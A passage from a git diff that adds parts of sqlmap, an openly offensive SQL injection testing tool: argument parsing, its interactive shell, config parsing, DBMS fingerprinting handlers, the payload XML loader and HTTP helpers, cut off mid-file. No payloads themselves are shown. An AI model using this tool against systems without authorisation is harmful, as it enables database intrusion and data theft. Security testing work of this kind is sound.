parser.formatter.indent_increment)) % retVal + return retVal + + parser.formatter._format_option_strings = parser.formatter.format_option_strings + parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser) + else: + def _format_action_invocation(self, action): + retVal = self.__format_action_invocation(action) + if len(retVal) > MAX_HELP_OPTION_LENGTH: + retVal = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - self._indent_increment)) % retVal + return retVal + + parser.formatter_class.__format_action_invocation = parser.formatter_class._format_action_invocation + parser.formatter_class._format_action_invocation = _format_action_invocation + + # Dirty hack for making a short option '-hh' + if hasattr(parser, "get_option"): + option = parser.get_option("--hh") + option._short_opts = ["-hh"] + option._long_opts = [] + else: + for action in get_actions(parser): + if action.option_strings == ["--hh"]: + action.option_strings = ["-hh"] + break + + # Dirty hack for inherent help message of switch '-h' + if hasattr(parser, "get_option"): + option = parser.get_option("-h") + option.help = option.help.capitalize().replace("this help", "basic help") + else: + for action in get_actions(parser): + if action.option_strings == ["-h", "--help"]: + action.help = action.help.capitalize().replace("this help", "basic help") + break + + _ = [] + advancedHelp = True + extraHeaders = [] + auxIndexes = {} + + # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") + for arg in argv: + _.append(getUnicode(arg, encoding=sys.stdin.encoding)) + + argv = _ + checkOldOptions(argv) + + if "--gui" in argv: + from lib.core.gui import runGui + + runGui(parser) + + raise SqlmapSilentQuitException + + elif "--shell" in argv: + _createHomeDirectories() + + parser.usage = "" + cmdLineOptions.sqlmapShell = True + + commands = set(("x", "q", "exit", "quit", "clear")) + commands.update(get_all_options(parser)) + + autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=commands) + + while True: + command = None + prompt = "sqlmap > " + + try: + # Note: in Python2 command should not be converted to Unicode before passing to shlex (Reference: https://bugs.python.org/issue1170) + command = _input(prompt).strip() + except (KeyboardInterrupt, EOFError): + print() + raise SqlmapShellQuitException + + command = re.sub(r"(?i)\Anew\s+", "", command or "") + + if not command: + continue + elif command.lower() == "clear": + clearHistory() + dataToStdout("[i] history cleared\n") + saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) + elif command.lower() in ("x", "q", "exit", "quit"): + raise SqlmapShellQuitException + elif command[0] != '-': + if not re.search(r"(?i)\A(\?|help)\Z", command): + dataToStdout("[!] invalid option(s) provided\n") + dataToStdout("[i] valid example: '-u http://www.site.com/vuln.php?id=1 --banner'\n") + else: + saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) + loadHistory(AUTOCOMPLETE_TYPE.SQLMAP) + break + + try: + for arg in shlex.split(command): + argv.append(getUnicode(arg, encoding=sys.stdin.encoding)) + except ValueError as ex: + raise SqlmapSyntaxException("something went wrong during command line parsing ('%s')" % getSafeExString(ex)) + + longOptions = set(re.findall(r"\-\-([^= ]+?)=", parser.format_help())) + longSwitches = set(re.findall(r"\-\-([^= ]+?)\s", parser.format_help())) + + for i in xrange(len(argv)): + # Reference: https://en.wiktionary.org/wiki/- + argv[i] = re.sub(u"\\A(\u2010|\u2013|\u2212|\u2014|\u4e00|\u1680|\uFE63|\uFF0D)+", lambda match: '-' * len(match.group(0)), argv[i]) + + # Reference: https://unicode-table.com/en/sets/quotation-marks/ + argv[i] = argv[i].strip(u"\u00AB\u2039\u00BB\u203A\u201E\u201C\u201F\u201D\u2019\u275D\u275E\u276E\u276F\u2E42\u301D\u301E\u301F\uFF02\u201A\u2018\u201B\u275B\u275C") + + if argv[i] == "-hh": + argv[i] = "-h" + elif i == 1 and re.search(r"\A(http|www\.|\w[\w.-]+\.\w{2,})", argv[i]) is not None: + argv[i] = "--url=%s" % argv[i] + elif len(argv[i]) > 1 and all(ord(_) in xrange(0x2018, 0x2020) for _ in ((argv[i].split('=', 1)[-1].strip() or ' ')[0], argv[i][-1])): + dataToStdout("[!] copy-pasting illegal (non-console) quote characters from Internet is illegal (%s)\n" % argv[i]) + raise SystemExit + elif len(argv[i]) > 1 and u"\uff0c" in argv[i].split('=', 1)[-1]: + dataToStdout("[!] copy-pasting illegal (non-console) comma characters from Internet is illegal (%s)\n" % argv[i]) + raise SystemExit + elif re.search(r"\A-\w=.+", argv[i]): + dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i]) + raise SystemExit + elif re.search(r"\A-\w{3,}", argv[i]): + if argv[i].strip('-').split('=')[0] in (longOptions | longSwitches): + argv[i] = "-%s" % argv[i] + elif argv[i] in IGNORED_OPTIONS: + argv[i] = "" + elif argv[i] in DEPRECATED_OPTIONS: + argv[i] = "" + elif argv[i].startswith("--data-raw"): + argv[i] = argv[i].replace("--data-raw", "--data", 1) + elif argv[i].startswith("--auth-creds"): + argv[i] = argv[i].replace("--auth-creds", "--auth-cred", 1) + elif argv[i].startswith("--drop-cookie"): + argv[i] = argv[i].replace("--drop-cookie", "--drop-set-cookie", 1) + elif re.search(r"\A--tamper[^=\s]", argv[i]): + argv[i] = "" + continue + elif re.search(r"\A(--(tamper|ignore-code|skip))(?!-)", argv[i]): + key = re.search(r"\-?\-(\w+)\b", argv[i]).group(1) + index = auxIndexes.get(key, None) + if index is None: + index = i if '=' in argv[i] else (i + 1 if i + 1 < len(argv) and not argv[i + 1].startswith('-') else None) + auxIndexes[key] = index + else: + delimiter = ',' + argv[index] = "%s%s%s" % (argv[index], delimiter, argv[i].split('=')[1] if '=' in argv[i] else (argv[i + 1] if i + 1 < len(argv) and not argv[i + 1].startswith('-') else "")) + argv[i] = "" + elif argv[i] in ("-H", "--header") or any(argv[i].startswith("%s=" % _) for _ in ("-H", "--header")): + if '=' in argv[i]: + extraHeaders.append(argv[i].split('=', 1)[1]) + elif i + 1 < len(argv): + extraHeaders.append(argv[i + 1]) + elif argv[i] == "--deps": + argv[i] = "--dependencies" + elif argv[i] == "--disable-colouring": + argv[i] = "--disable-coloring" + elif argv[i] == "-r": + for j in xrange(i + 2, len(argv)): + value = argv[j] + if os.path.isfile(value): + argv[i + 1] += ",%s" % value + argv[j] = '' + else: + break + elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]): + argv[i] = argv[i][:-1] + conf.skipThreadCheck = True + elif argv[i] == "--version": + print(VERSION_STRING.split('/')[-1]) + raise SystemExit + elif argv[i] in ("-h", "--help"): + advancedHelp = False + for group in get_groups(parser)[:]: + found = False + for option in get_actions(group): + if option.dest not in BASIC_HELP_ITEMS: + option.help = SUPPRESS + else: + found = True + if not found: + get_groups(parser).remove(group) + elif '=' in argv[i] and not argv[i].startswith('-') and argv[i].split('=')[0] in longOptions and re.search(r"\A-{1,2}\w", argv[i - 1]) is None: + dataToStdout("[!] detected usage of long-option without a starting hyphen ('%s')\n" % argv[i]) + raise SystemExit + + for verbosity in (_ for _ in argv if re.search(r"\A\-v+\Z", _)): + try: + if argv.index(verbosity) == len(argv) - 1 or not argv[argv.index(verbosity) + 1].isdigit(): + conf.verbose = verbosity.count('v') + del argv[argv.index(verbosity)] + except (IndexError, ValueError): + pass + + try: + (args, _) = parser.parse_known_args(argv) if hasattr(parser, "parse_known_args") else parser.parse_args(argv) + except UnicodeEncodeError as ex: + dataToStdout("\n[!] %s\n" % getUnicode(ex.object.encode("unicode-escape"))) + raise SystemExit + except SystemExit: + if "-h" in argv and not advancedHelp: + dataToStdout("\n[!] to see full list of options run with '-hh'\n") + raise + + if extraHeaders: + if not args.headers: + args.headers = "" + delimiter = "\\n" if "\\n" in args.headers else "\n" + args.headers += delimiter + delimiter.join(extraHeaders) + + # Expand given mnemonic options (e.g. -z "ign,flu,bat") + for i in xrange(len(argv) - 1): + if argv[i] == "-z": + expandMnemonics(argv[i + 1], parser, args) + + if args.dummy: + args.url = args.url or DUMMY_URL + + if hasattr(sys.stdin, "fileno") and not any((os.isatty(sys.stdin.fileno()), args.api, args.ignoreStdin, "GITHUB_ACTIONS" in os.environ)): + args.stdinPipe = iter(sys.stdin.readline, None) + else: + args.stdinPipe = None + + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.vulnTest, args.wizard, args.dependencies, args.purge, args.listTampers, args.hashFile, args.stdinPipe)): + errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). " + errMsg += "Use -h for basic and -hh for advanced help\n" + parser.error(errMsg) + + return args + + except (ArgumentError, TypeError) as ex: + parser.error(ex) + + except SystemExit: + # Protection against Windows dummy double clicking + if IS_WIN and "--non-interactive" not in sys.argv: + dataToStdout("\nPress Enter to continue...") + _input() + raise + + debugMsg = "parsing command line" + logger.debug(debugMsg) diff --git a/src/sqlmap-master/lib/parse/configfile.py b/src/sqlmap-master/lib/parse/configfile.py new file mode 100644 index 0000000..19b6e8e --- /dev/null +++ b/src/sqlmap-master/lib/parse/configfile.py @@ -0,0 +1,98 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import checkFile +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.common import unArrayizeValue +from lib.core.common import UnicodeRawConfigParser +from lib.core.convert import getUnicode +from lib.core.data import cmdLineOptions +from lib.core.data import conf +from lib.core.data import logger +from lib.core.enums import OPTION_TYPE +from lib.core.exception import SqlmapMissingMandatoryOptionException +from lib.core.exception import SqlmapSyntaxException +from lib.core.optiondict import optDict + +config = None + +def configFileProxy(section, option, datatype): + """ + Parse configuration file and save settings into the configuration + advanced dictionary. + """ + + if config.has_option(section, option): + try: + if datatype == OPTION_TYPE.BOOLEAN: + value = config.getboolean(section, option) if config.get(section, option) else False + elif datatype == OPTION_TYPE.INTEGER: + value = config.getint(section, option) if config.get(section, option) else 0 + elif datatype == OPTION_TYPE.FLOAT: + value = config.getfloat(section, option) if config.get(section, option) else 0.0 + else: + value = config.get(section, option) + except ValueError as ex: + errMsg = "error occurred while processing the option " + errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex)) + raise SqlmapSyntaxException(errMsg) + + if value: + conf[option] = value + else: + conf[option] = None + else: + debugMsg = "missing requested option '%s' (section " % option + debugMsg += "'%s') into the configuration file, " % section + debugMsg += "ignoring. Skipping to next." + logger.debug(debugMsg) + +def configFileParser(configFile): + """ + Parse configuration file and save settings into the configuration + advanced dictionary. + """ + + global config + + debugMsg = "parsing configuration file" + logger.debug(debugMsg) + + checkFile(configFile) + configFP = openFile(configFile, "rb") + + try: + config = UnicodeRawConfigParser() + if hasattr(config, "read_file"): + config.read_file(configFP) + else: + config.readfp(configFP) + except Exception as ex: + errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex) + raise SqlmapSyntaxException(errMsg) + + if not config.has_section("Target"): + errMsg = "missing a mandatory section 'Target' in the configuration file" + raise SqlmapMissingMandatoryOptionException(errMsg) + + mandatory = False + + for option in ("direct", "url", "logFile", "bulkFile", "googleDork", "requestFile", "wizard"): + if config.has_option("Target", option) and config.get("Target", option) or cmdLineOptions.get(option): + mandatory = True + break + + if not mandatory: + errMsg = "missing a mandatory option in the configuration file " + errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile or wizard)" + raise SqlmapMissingMandatoryOptionException(errMsg) + + for family, optionData in optDict.items(): + for option, datatype in optionData.items(): + datatype = unArrayizeValue(datatype) + configFileProxy(family, option, datatype) diff --git a/src/sqlmap-master/lib/parse/handler.py b/src/sqlmap-master/lib/parse/handler.py new file mode 100644 index 0000000..e1af2e5 --- /dev/null +++ b/src/sqlmap-master/lib/parse/handler.py @@ -0,0 +1,79 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from xml.sax.handler import ContentHandler + +from lib.core.common import sanitizeStr + +class FingerprintHandler(ContentHandler): + """ + This class defines methods to parse and extract information from + the given DBMS banner based upon the data in XML file + """ + + def __init__(self, banner, info): + ContentHandler.__init__(self) + + self._banner = sanitizeStr(banner or "") + self._regexp = None + self._match = None + self._dbmsVersion = None + self._techVersion = None + self._info = info + + def _feedInfo(self, key, value): + value = sanitizeStr(value) + + if value in (None, "None", ""): + return + + if key == "dbmsVersion": + self._info[key] = value + else: + if key not in self._info: + self._info[key] = set() + + for _ in value.split("|"): + self._info[key].add(_) + + def startElement(self, name, attrs): + if name == "regexp": + self._regexp = sanitizeStr(attrs.get("value")) + _ = re.match(r"\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes + + if _ and self._banner and _.group(0).lower() in self._banner.lower() or not _: + self._match = re.search(self._regexp, self._banner, re.I | re.M) + else: + self._match = None + + if name == "info" and self._match: + self._feedInfo("type", attrs.get("type")) + self._feedInfo("distrib", attrs.get("distrib")) + self._feedInfo("release", attrs.get("release")) + self._feedInfo("codename", attrs.get("codename")) + + self._dbmsVersion = sanitizeStr(attrs.get("dbms_version")) + self._techVersion = sanitizeStr(attrs.get("tech_version")) + self._sp = sanitizeStr(attrs.get("sp")) + + if self._dbmsVersion and self._dbmsVersion.isdigit(): + self._feedInfo("dbmsVersion", self._match.group(int(self._dbmsVersion))) + + if self._techVersion and self._techVersion.isdigit(): + self._feedInfo("technology", "%s %s" % (attrs.get("technology"), self._match.group(int(self._techVersion)))) + else: + self._feedInfo("technology", attrs.get("technology")) + + if self._sp.isdigit(): + self._feedInfo("sp", "Service Pack %s" % int(self._sp)) + + self._regexp = None + self._match = None + self._dbmsVersion = None + self._techVersion = None diff --git a/src/sqlmap-master/lib/parse/headers.py b/src/sqlmap-master/lib/parse/headers.py new file mode 100644 index 0000000..39e40a1 --- /dev/null +++ b/src/sqlmap-master/lib/parse/headers.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import os + +from lib.core.common import parseXmlFile +from lib.core.data import kb +from lib.core.data import paths +from lib.parse.handler import FingerprintHandler + +def headersParser(headers): + """ + This function calls a class that parses the input HTTP headers to + fingerprint the back-end database management system operating system + and the web application technology + """ + + if not kb.headerPaths: + kb.headerPaths = { + "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"), + "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), + "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"), + "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"), + "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), + "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), + } + + for header in (_.lower() for _ in headers if _.lower() in kb.headerPaths): + value = headers[header] + xmlfile = kb.headerPaths[header] + handler = FingerprintHandler(value, kb.headersFp) + parseXmlFile(xmlfile, handler) + parseXmlFile(paths.GENERIC_XML, handler) diff --git a/src/sqlmap-master/lib/parse/html.py b/src/sqlmap-master/lib/parse/html.py new file mode 100644 index 0000000..374c1a2 --- /dev/null +++ b/src/sqlmap-master/lib/parse/html.py @@ -0,0 +1,99 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from xml.sax.handler import ContentHandler + +from lib.core.common import urldecode +from lib.core.common import parseXmlFile +from lib.core.data import kb +from lib.core.data import paths +from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD +from lib.core.threads import getCurrentThreadData + +class HTMLHandler(ContentHandler): + """ + This class defines methods to parse the input HTML page to + fingerprint the back-end database management system + """ + + def __init__(self, page): + ContentHandler.__init__(self) + + self._dbms = None + self._page = (page or "") + try: + self._lower_page = self._page.lower() + except SystemError: # https://bugs.python.org/issue18183 + self._lower_page = None + self._urldecoded_page = urldecode(self._page) + + self.dbms = None + + def _markAsErrorPage(self): + threadData = getCurrentThreadData() + threadData.lastErrorPage = (threadData.lastRequestUID, self._page) + + def startElement(self, name, attrs): + if self.dbms: + return + + if name == "dbms": + self._dbms = attrs.get("value") + + elif name == "error": + regexp = attrs.get("regexp") + if regexp not in kb.cache.regex: + keywords = re.findall(r"\w+", re.sub(r"\\.", " ", regexp)) + keywords = sorted(keywords, key=len) + kb.cache.regex[regexp] = keywords[-1].lower() + + if ('|' in regexp or kb.cache.regex[regexp] in (self._lower_page or kb.cache.regex[regexp])) and re.search(regexp, self._urldecoded_page, re.I): + self.dbms = self._dbms + self._markAsErrorPage() + kb.forkNote = kb.forkNote or attrs.get("fork") + +def htmlParser(page): + """ + This function calls a class that parses the input HTML page to + fingerprint the back-end database management system + + >>> from lib.core.enums import DBMS + >>> htmlParser("Warning: mysql_fetch_array() expects parameter 1 to be resource") == DBMS.MYSQL + True + >>> threadData = getCurrentThreadData() + >>> threadData.lastErrorPage = None + """ + + page = page[:HEURISTIC_PAGE_SIZE_THRESHOLD] + + xmlfile = paths.ERRORS_XML + handler = HTMLHandler(page) + key = hash(page) + + # generic SQL warning/error messages + if re.search(r"SQL (warning|error|syntax)", page, re.I): + handler._markAsErrorPage() + + if key in kb.cache.parsedDbms: + retVal = kb.cache.parsedDbms[key] + if retVal: + handler._markAsErrorPage() + return retVal + + parseXmlFile(xmlfile, handler) + + if handler.dbms and handler.dbms not in kb.htmlFp: + kb.lastParserStatus = handler.dbms + kb.htmlFp.append(handler.dbms) + else: + kb.lastParserStatus = None + + kb.cache.parsedDbms[key] = handler.dbms + + return handler.dbms diff --git a/src/sqlmap-master/lib/parse/payloads.py b/src/sqlmap-master/lib/parse/payloads.py new file mode 100644 index 0000000..5950787 --- /dev/null +++ b/src/sqlmap-master/lib/parse/payloads.py @@ -0,0 +1,122 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from xml.etree import ElementTree as et + +from lib.core.common import getSafeExString +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import paths +from lib.core.datatype import AttribDict +from lib.core.exception import SqlmapInstallationException +from lib.core.settings import PAYLOAD_XML_FILES + +def cleanupVals(text, tag): + if tag == "clause" and '-' in text: + text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text) + + if tag in ("clause", "where"): + text = text.split(',') + + if hasattr(text, "isdigit") and text.isdigit(): + text = int(text) + + elif isinstance(text, list): + count = 0 + + for _ in text: + text[count] = int(_) if _.isdigit() else _ + count += 1 + + if len(text) == 1 and tag not in ("clause", "where"): + text = text[0] + + return text + +def parseXmlNode(node): + for element in node.findall("boundary"): + boundary = AttribDict() + + for child in element: + if child.text: + values = cleanupVals(child.text, child.tag) + boundary[child.tag] = values + else: + boundary[child.tag] = None + + conf.boundaries.append(boundary) + + for element in node.findall("test"): + test = AttribDict() + + for child in element: + if child.text and child.text.strip(): + values = cleanupVals(child.text, child.tag) + test[child.tag] = values + else: + if len(child.findall("*")) == 0: + test[child.tag] = None + continue + else: + test[child.tag] = AttribDict() + + for gchild in child: + if gchild.tag in test[child.tag]: + prevtext = test[child.tag][gchild.tag] + test[child.tag][gchild.tag] = [prevtext, gchild.text] + else: + test[child.tag][gchild.tag] = gchild.text + + conf.tests.append(test) + +def loadBoundaries(): + """ + Loads boundaries from XML + + >>> conf.boundaries = [] + >>> loadBoundaries() + >>> len(conf.boundaries) > 0 + True + """ + + try: + doc = et.parse(paths.BOUNDARIES_XML) + except Exception as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + + root = doc.getroot() + parseXmlNode(root) + +def loadPayloads(): + """ + Loads payloads/tests from XML + + >>> conf.tests = [] + >>> loadPayloads() + >>> len(conf.tests) > 0 + True + """ + + for payloadFile in PAYLOAD_XML_FILES: + payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile) + + try: + doc = et.parse(payloadFilePath) + except Exception as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + + root = doc.getroot() + parseXmlNode(root) diff --git a/src/sqlmap-master/lib/parse/sitemap.py b/src/sqlmap-master/lib/parse/sitemap.py new file mode 100644 index 0000000..542a58d --- /dev/null +++ b/src/sqlmap-master/lib/parse/sitemap.py @@ -0,0 +1,56 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.common import readInput +from lib.core.data import kb +from lib.core.data import logger +from lib.core.datatype import OrderedSet +from lib.core.exception import SqlmapSyntaxException +from lib.request.connect import Connect as Request +from thirdparty.six.moves import http_client as _http_client + +abortedFlag = None + +def parseSitemap(url, retVal=None): + global abortedFlag + + if retVal is not None: + logger.debug("parsing sitemap '%s'" % url) + + try: + if retVal is None: + abortedFlag = False + retVal = OrderedSet() + + try: + content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" + except _http_client.InvalidURL: + errMsg = "invalid URL given for sitemap ('%s')" % url + raise SqlmapSyntaxException(errMsg) + + for match in re.finditer(r"\s*([^<]+)", content or ""): + if abortedFlag: + break + url = match.group(1).strip() + if url.endswith(".xml") and "sitemap" in url.lower(): + if kb.followSitemapRecursion is None: + message = "sitemap recursion detected. Do you want to follow? [y/N] " + kb.followSitemapRecursion = readInput(message, default='N', boolean=True) + if kb.followSitemapRecursion: + parseSitemap(url, retVal) + else: + retVal.add(url) + + except KeyboardInterrupt: + abortedFlag = True + warnMsg = "user aborted during sitemap parsing. sqlmap " + warnMsg += "will use partial list" + logger.warning(warnMsg) + + return retVal diff --git a/src/sqlmap-master/lib/request/__init__.py b/src/sqlmap-master/lib/request/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/lib/request/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/lib/request/basic.py b/src/sqlmap-master/lib/request/basic.py new file mode 100644 index 0000000..921ed2f --- /dev/null +++ b/src/sqlmap-master/lib/request/basic.py @@ -0,0 +1,446 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import codecs +import gzip +import io +import logging +import re +import struct +import zlib + +from lib.core.common import Backend +from lib.core.common import extractErrorMessage +from lib.core.common import extractRegexResult +from lib.core.common import filterNone +from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString +from lib.core.common import isListLike +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.common import resetCookieJar +from lib.core.common import singleTimeLogMessage +from lib.core.common import singleTimeWarnMessage +from lib.core.common import unArrayizeValue +from lib.core.convert import decodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import cachedmethod +from lib.core.decorators import lockedmethod +from lib.core.dicts import HTML_ENTITIES +from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER +from lib.core.enums import PLACE +from lib.core.exception import SqlmapCompressionException +from lib.core.settings import BLOCKED_IP_REGEX +from lib.core.settings import DEFAULT_COOKIE_DELIMITER +from lib.core.settings import EVENTVALIDATION_REGEX +from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD +from lib.core.settings import IDENTYWAF_PARSE_LIMIT +from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE +from lib.core.settings import META_CHARSET_REGEX +from lib.core.settings import PARSE_HEADERS_LIMIT +from lib.core.settings import PRINTABLE_BYTES +from lib.core.settings import SELECT_FROM_TABLE_REGEX +from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import VIEWSTATE_REGEX +from lib.parse.headers import headersParser +from lib.parse.html import htmlParser +from thirdparty import six +from thirdparty.chardet import detect +from thirdparty.identywaf import identYwaf +from thirdparty.odict import OrderedDict +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import http_client as _http_client + +@lockedmethod +def forgeHeaders(items=None, base=None): + """ + Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing + the HTTP requests + """ + + items = items or {} + + for _ in list(items.keys()): + if items[_] is None: + del items[_] + + headers = OrderedDict(conf.httpHeaders if base is None else base) + headers.update(items.items()) + + class _str(str): + def capitalize(self): + return _str(self) + + def title(self): + return _str(self) + + _ = headers + headers = OrderedDict() + for key, value in _.items(): + success = False + + for _ in headers: + if _.upper() == key.upper(): + del headers[_] + break + + if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)): + try: + headers[_str(key)] = value # dirty hack for http://bugs.python.org/issue12455 + except UnicodeEncodeError: # don't do the hack on non-ASCII header names (they have to be properly encoded later on) + pass + else: + success = True + if not success: + key = '-'.join(_.capitalize() for _ in key.split('-')) + headers[key] = value + + if conf.cj: + if HTTP_HEADER.COOKIE in headers: + for cookie in conf.cj: + if cookie is None or cookie.domain_specified and not (conf.hostname or "").endswith(cookie.domain): + continue + + if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]): + if conf.loadCookies: + conf.httpHeaders = filterNone((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders) + elif kb.mergeCookies is None: + message = "you provided a HTTP %s header value, while " % HTTP_HEADER.COOKIE + message += "target URL provides its own cookies within " + message += "HTTP %s header which intersect with yours. " % HTTP_HEADER.SET_COOKIE + message += "Do you want to merge them in further requests? [Y/n] " + + kb.mergeCookies = readInput(message, default='Y', boolean=True) + + if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: + def _(value): + return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value) + + headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) + + if PLACE.COOKIE in conf.parameters: + conf.parameters[PLACE.COOKIE] = _(conf.parameters[PLACE.COOKIE]) + + conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders] + + elif not kb.testMode: + headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, getUnicode(cookie.name), getUnicode(cookie.value)) + + if kb.testMode and not any((conf.csrfToken, conf.safeUrl)): + resetCookieJar(conf.cj) + + return headers + +def parseResponse(page, headers, status=None): + """ + @param page: the page to parse to feed the knowledge base htmlFp + (back-end DBMS fingerprint based upon DBMS error messages return + through the web application) list and absFilePaths (absolute file + paths) set. + """ + + if headers: + headersParser(headers) + + if page: + htmlParser(page if not status else "%s\n\n%s" % (status, page)) + +@cachedmethod +def checkCharEncoding(encoding, warn=True): + """ + Checks encoding name, repairs common misspellings and adjusts to + proper namings used in codecs module + + >>> checkCharEncoding('iso-8858', False) + 'iso8859-1' + >>> checkCharEncoding('en_us', False) + 'utf8' + """ + + if isinstance(encoding, six.binary_type): + encoding = getUnicode(encoding) + + if isListLike(encoding): + encoding = unArrayizeValue(encoding) + + if encoding: + encoding = encoding.lower() + else: + return encoding + + # Reference: http://www.destructor.de/charsets/index.htm + translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} + + for delimiter in (';', ',', '('): + if delimiter in encoding: + encoding = encoding[:encoding.find(delimiter)].strip() + + encoding = encoding.replace(""", "") + + # popular typos/errors + if "8858" in encoding: + encoding = encoding.replace("8858", "8859") # iso-8858 -> iso-8859 + elif "8559" in encoding: + encoding = encoding.replace("8559", "8859") # iso-8559 -> iso-8859 + elif "8895" in encoding: + encoding = encoding.replace("8895", "8859") # iso-8895 -> iso-8859 + elif "5889" in encoding: + encoding = encoding.replace("5889", "8859") # iso-5889 -> iso-8859 + elif "5589" in encoding: + encoding = encoding.replace("5589", "8859") # iso-5589 -> iso-8859 + elif "2313" in encoding: + encoding = encoding.replace("2313", "2312") # gb2313 -> gb2312 + elif encoding.startswith("x-"): + encoding = encoding[len("x-"):] # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish + elif "windows-cp" in encoding: + encoding = encoding.replace("windows-cp", "windows") # windows-cp-1254 -> windows-1254 + + # name adjustment for compatibility + if encoding.startswith("8859"): + encoding = "iso-%s" % encoding + elif encoding.startswith("cp-"): + encoding = "cp%s" % encoding[3:] + elif encoding.startswith("euc-"): + encoding = "euc_%s" % encoding[4:] + elif encoding.startswith("windows") and not encoding.startswith("windows-"): + encoding = "windows-%s" % encoding[7:] + elif encoding.find("iso-88") > 0: + encoding = encoding[encoding.find("iso-88"):] + elif encoding.startswith("is0-"): + encoding = "iso%s" % encoding[4:] + elif encoding.find("ascii") > 0: + encoding = 